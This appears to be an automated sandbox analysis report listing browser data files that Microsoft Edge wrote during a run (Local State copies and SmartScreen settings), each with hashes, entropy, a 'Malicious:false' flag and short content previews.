                                                                                                                                                                                                                                                                        SHA1:A05BB3B3647986AFBB19951661996A1943A5E2C5
                                                                                                                                                                                                                                                                        SHA-256:3C736EBEE3E90E09176230967D5CA299C1780A36DEA8AEAD9D6D31984DF6B9F8
                                                                                                                                                                                                                                                                        SHA-512:15DD5FF87FF30EB8C6C292590F330E4E4E383FEE307A262C6ECD3FE5C643D38F0F6BFBDA6C9B7D88267B695849C7644B11BAF908D9431BC6A2C5264472434742
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3ce3e.TMP (copy)

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):44137
                                                                                                                                                                                                                                                                        Entropy (8bit):6.09074410160948
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMzwuF9hDO6vP6O+etbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEH6ntbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                        MD5:4E2000BC4580BB65AAB7FB71F15F1108
                                                                                                                                                                                                                                                                        SHA1:A05BB3B3647986AFBB19951661996A1943A5E2C5
                                                                                                                                                                                                                                                                        SHA-256:3C736EBEE3E90E09176230967D5CA299C1780A36DEA8AEAD9D6D31984DF6B9F8
                                                                                                                                                                                                                                                                        SHA-512:15DD5FF87FF30EB8C6C292590F330E4E4E383FEE307A262C6ECD3FE5C643D38F0F6BFBDA6C9B7D88267B695849C7644B11BAF908D9431BC6A2C5264472434742
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF41384.TMP (copy)

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):44137
                                                                                                                                                                                                                                                                        Entropy (8bit):6.09074410160948
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMzwuF9hDO6vP6O+etbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEH6ntbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                        MD5:4E2000BC4580BB65AAB7FB71F15F1108
                                                                                                                                                                                                                                                                        SHA1:A05BB3B3647986AFBB19951661996A1943A5E2C5
                                                                                                                                                                                                                                                                        SHA-256:3C736EBEE3E90E09176230967D5CA299C1780A36DEA8AEAD9D6D31984DF6B9F8
                                                                                                                                                                                                                                                                        SHA-512:15DD5FF87FF30EB8C6C292590F330E4E4E383FEE307A262C6ECD3FE5C643D38F0F6BFBDA6C9B7D88267B695849C7644B11BAF908D9431BC6A2C5264472434742
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF4b840.TMP (copy)

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):44137
                                                                                                                                                                                                                                                                        Entropy (8bit):6.09074410160948
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMzwuF9hDO6vP6O+etbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEH6ntbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                        MD5:4E2000BC4580BB65AAB7FB71F15F1108
                                                                                                                                                                                                                                                                        SHA1:A05BB3B3647986AFBB19951661996A1943A5E2C5
                                                                                                                                                                                                                                                                        SHA-256:3C736EBEE3E90E09176230967D5CA299C1780A36DEA8AEAD9D6D31984DF6B9F8
                                                                                                                                                                                                                                                                        SHA-512:15DD5FF87FF30EB8C6C292590F330E4E4E383FEE307A262C6ECD3FE5C643D38F0F6BFBDA6C9B7D88267B695849C7644B11BAF908D9431BC6A2C5264472434742
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Nurturing\campaign_history

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                                                                                                        Entropy (8bit):0.6773696719930975
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:TLpUAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3islRud6zcQAJmdngzQdoO:TLiOUOq0afDdWec9sJhOs3fsuZ7J5fc
                                                                                                                                                                                                                                                                        MD5:6FFCCB198DC6B17E165460E6E246B03C
                                                                                                                                                                                                                                                                        SHA1:014A46B0E6E84089E1C20FA232F54CA737D5F023
                                                                                                                                                                                                                                                                        SHA-256:D1B2EC8C9906C3418837FFB8E116AA59C026DE2D67B2AFDA956F14D0DC3851AF
                                                                                                                                                                                                                                                                        SHA-512:846AE3D0A49A14BF82203A0FEDAD6E794F7E68C22A40EE0E014FEA99DFC676FAE4AFEB2C56F324E4361E83A35458C63E2ABAA7B28B6D23B20FA29EF47CBE87B3
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):47
                                                                                                                                                                                                                                                                        Entropy (8bit):4.3818353308528755
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
                                                                                                                                                                                                                                                                        MD5:48324111147DECC23AC222A361873FC5
                                                                                                                                                                                                                                                                        SHA1:0DF8B2267ABBDBD11C422D23338262E3131A4223
                                                                                                                                                                                                                                                                        SHA-256:D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
                                                                                                                                                                                                                                                                        SHA-512:E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:customSettings_F95BA787499AB4FA9EFFF472CE383A14

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings_F95BA787499AB4FA9EFFF472CE383A14

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):35
                                                                                                                                                                                                                                                                        Entropy (8bit):4.014438730983427
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
                                                                                                                                                                                                                                                                        MD5:BB57A76019EADEDC27F04EB2FB1F1841
                                                                                                                                                                                                                                                                        SHA1:8B41A1B995D45B7A74A365B6B1F1F21F72F86760
                                                                                                                                                                                                                                                                        SHA-256:2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
                                                                                                                                                                                                                                                                        SHA-512:A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{"forceServiceDetermination":false}

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):81
                                                                                                                                                                                                                                                                        Entropy (8bit):4.3439888556902035
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:kDnaV6bVsFUIMf1HDOWg3djTHXoSWDSQ97P:kDYaoUIe1HDM3oskP
                                                                                                                                                                                                                                                                        MD5:177F4D75F4FEE84EF08C507C3476C0D2
                                                                                                                                                                                                                                                                        SHA1:08E17AEB4D4066AC034207420F1F73DD8BE3FAA0
                                                                                                                                                                                                                                                                        SHA-256:21EE7A30C2409E0041CDA6C04EEE72688EB92FE995DC94487FF93AD32BD8F849
                                                                                                                                                                                                                                                                        SHA-512:94FC142B3CC4844BF2C0A72BCE57363C554356C799F6E581AA3012E48375F02ABD820076A8C2902A3C6BE6AC4D8FA8D4F010D4FF261327E878AF5E5EE31038FB
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):130439
                                                                                                                                                                                                                                                                        Entropy (8bit):3.80180718117079
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:1536:RlIyFAMrwvaGbyLWzDr6PDofI8vsUnPRLz+PMh:weWGP7Eh
                                                                                                                                                                                                                                                                        MD5:EB75CEFFE37E6DF9C171EE8380439EDA
                                                                                                                                                                                                                                                                        SHA1:F00119BA869133D64E4F7F0181161BD47968FA23
                                                                                                                                                                                                                                                                        SHA-256:48B11410DC937A1723BF4C5AD33ECDB286D8EC69544241BC373F753E64B396C1
                                                                                                                                                                                                                                                                        SHA-512:044C5113D877CE2E3B42CF07670620937ED7BE2D8B3BF2BAB085C43EF4F64598A7AC56328DDBBE7F0F3CFB9EA49D38CA332BB4ECBFEDBE24AE53B14334A30C8E
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{.. "geoidMaps": {.. "au": "https://australia.smartscreen.microsoft.com/",.. "ch": "https://switzerland.smartscreen.microsoft.com/",.. "eu": "https://europe.smartscreen.microsoft.com/",.. "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "in": "https://india.smartscreen.microsoft.com/",.. "test": "https://eu-9.smartscreen.microsoft.com/",.. "uk": "https://unitedkingdom.smartscreen.microsoft.com/",.. "us": "https://unitedstates.smartscreen.microsoft.com/",.. "gw_au": "https://australia.smartscreen.microsoft.com/",.. "gw_ch": "https://switzerland.smartscreen.microsoft.com/",.. "gw_eu": "https://europe.smartscreen.microsoft.com/",.. "gw_ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "gw_ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "gw_ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "gw_in": "https

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):40
                                                                                                                                                                                                                                                                        Entropy (8bit):4.346439344671015
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:kfKbUPVXXMVQX:kygV5
                                                                                                                                                                                                                                                                        MD5:6A3A60A3F78299444AACAA89710A64B6
                                                                                                                                                                                                                                                                        SHA1:2A052BF5CF54F980475085EEF459D94C3CE5EF55
                                                                                                                                                                                                                                                                        SHA-256:61597278D681774EFD8EB92F5836EB6362975A74CEF807CE548E50A7EC38E11F
                                                                                                                                                                                                                                                                        SHA-512:C5D0419869A43D712B29A5A11DC590690B5876D1D95C1F1380C2F773CA0CB07B173474EE16FE66A6AF633B04CC84E58924A62F00DCC171B2656D554864BF57A4
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:synchronousLookupUris_638343870221005468

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris_638343870221005468

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):57
                                                                                                                                                                                                                                                                        Entropy (8bit):4.556488479039065
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:GSCIPPlzYxi21goD:bCWBYx99D
                                                                                                                                                                                                                                                                        MD5:3A05EAEA94307F8C57BAC69C3DF64E59
                                                                                                                                                                                                                                                                        SHA1:9B852B902B72B9D5F7B9158E306E1A2C5F6112C8
                                                                                                                                                                                                                                                                        SHA-256:A8EF112DF7DAD4B09AAA48C3E53272A2EEC139E86590FD80E2B7CBD23D14C09E
                                                                                                                                                                                                                                                                        SHA-512:6080AEF2339031FAFDCFB00D3179285E09B707A846FD2EA03921467DF5930B3F9C629D37400D625A8571B900BC46021047770BAC238F6BAC544B48FB3D522FB0
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:9.......murmur3.............,M.h...Z...8.\..<&Li.H..[.?m

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):29
                                                                                                                                                                                                                                                                        Entropy (8bit):4.030394788231021
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:0xXeZUSXkcVn:0Re5kcV
                                                                                                                                                                                                                                                                        MD5:52E2839549E67CE774547C9F07740500
                                                                                                                                                                                                                                                                        SHA1:B172E16D7756483DF0CA0A8D4F7640DD5D557201
                                                                                                                                                                                                                                                                        SHA-256:F81B7B9CE24F5A2B94182E817037B5F1089DC764BC7E55A9B0A6227A7E121F32
                                                                                                                                                                                                                                                                        SHA-512:D80E7351E4D83463255C002D3FDCE7E5274177C24C4C728D7B7932D0BE3EBCFEB68E1E65697ED5E162E1B423BB8CDFA0864981C4B466D6AD8B5E724D84B4203B
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:topTraffic_638004170464094982

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_170540185939602997400506234197983529371

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):575056
                                                                                                                                                                                                                                                                        Entropy (8bit):7.999649474060713
                                                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                                                        SSDEEP:12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
                                                                                                                                                                                                                                                                        MD5:BE5D1A12C1644421F877787F8E76642D
                                                                                                                                                                                                                                                                        SHA1:06C46A95B4BD5E145E015FA7E358A2D1AC52C809
                                                                                                                                                                                                                                                                        SHA-256:C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
                                                                                                                                                                                                                                                                        SHA-512:FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:...._+jE.`..}....S..1....G}s..E....y".Wh.^.W.H...-...#.A...KR...9b........>k......bU.IVo...D......Y..[l.yx.......'c=..I0.....E.d...-...1 ....m../C...OQ.........qW..<:N.....38.u..X-..s....<..U.,Mi..._.......`.Y/.........^..,.E..........j@..G8..N.... ..Ea...4.+.79k.!T.-5W..!..@+..!.P..LDG.....V."....L.... .(#..$..&......C.....%A.T}....K_.S..'Q.".d....s....(j.D!......Ov..)*d0)."(..%..-..G..L.}....i.....m9;.....t.w..0....f?..-..M.c.3.....N7K.T..D>.3.x...z..u$5!..4..T.....U.O^L{.5..=E..'..;.}(|.6.:..f!.>...?M.8......P.D.J.I4.<...*.y.E....>....i%.6..Y.@..n.....M..r..C.f.;..<..0.H...F....h.......HB1]1....u..:...H..k....B.Q..J...@}j~.#...'Y.J~....I...ub.&..L[z..1.W/.Ck....M.......[.......N.F..z*.{nZ~d.V.4.u.K.V.......X.<p..cz..>*....X...W..da3(..g..Z$.L4.j=~.p.l.\.[e.&&.Y ...U)..._.^r0.,.{_......`S..[....(.\..p.bt.g..%.$+....f.....d....Im..f...W ......G..i_8a..ae..7....pS.....z-H..A.s.4.3..O.r.....u.S......a.}..v.-/..... ...a.x#./:...sS&U.().xL...pg

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_638004170464094982

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:raw G3 (Group 3) FAX, byte-padded
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):460992
                                                                                                                                                                                                                                                                        Entropy (8bit):7.999625908035124
                                                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                                                        SSDEEP:12288:KaRwcD8XXTZGZJHXBjOVX3xFttENr4+3eGPnKvJWXrydqb:KaR5oZ2MBFt8r4+3eG/URdqb
                                                                                                                                                                                                                                                                        MD5:E9C502DB957CDB977E7F5745B34C32E6
                                                                                                                                                                                                                                                                        SHA1:DBD72B0D3F46FA35A9FE2527C25271AEC08E3933
                                                                                                                                                                                                                                                                        SHA-256:5A6B49358772DB0B5C682575F02E8630083568542B984D6D00727740506569D4
                                                                                                                                                                                                                                                                        SHA-512:B846E682427CF144A440619258F5AA5C94CAEE7612127A60E4BD3C712F8FF614DA232D9A488E27FC2B0D53FD6ACF05409958AEA3B21EA2C1127821BD8E87A5CA
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:...2lI.5.<C.;.{....._+jE.`..}....-...#.A...KR...l.M0,s...).9..........x.......F.b......jU....y.h'....L<...*..Z..*%.*..._...g.4yu...........'c=..I0..........qW..<:N....<..U.,Mi..._......'(..U.9.!........u....7...4. ..Ea...4.+.79k.!T.-5W..!..@+..$..t|1.E..7F...+..xf....z&_Q...-.B...)8R.c....0.......B.M.Z...0....&v..<..H...3.....N7K.T..D>.8......P.D.J.I4.B.H.VHy...@.Wc.Cl..6aD..j.....E..*4..mI..X]2.GH.G.L...E.F.=.J...@}j~.#...'Y.L[z..1.W/.Ck....L..X........J.NYd........>...N.F..z*.{nZ~d.N..../..6.\L...Q...+.w..p...>.S.iG...0]..8....S..)`B#.v..^.*.T.?...Z.rz.D'.!.T.w....S..8....V.4.u.K.V.......W.6s...Y.).[.c.X.S..........5.X7F...tQ....z.L.X..(3#j...8...i.[..j$.Q....0...]"W.c.H..n..2Te.ak...c..-F(..W2.b....3.]......c.d|.../....._...f.....d....Im..g.b..R.q.<x*x...i2..r.I()Iat..b.j.r@K.+5..C.....nJ.>*P,.V@.....s.4.3..O.r.....smd7...L.....].u&1../t.*.......uXb...=@.....wv......]....#.{$.w......i.....|.....?....E7...}$+..t).E.U..Q..~.`.)..Y@.6.h.......%(

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):9
                                                                                                                                                                                                                                                                        Entropy (8bit):3.169925001442312
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:CMzOn:CM6
                                                                                                                                                                                                                                                                        MD5:B6F7A6B03164D4BF8E3531A5CF721D30
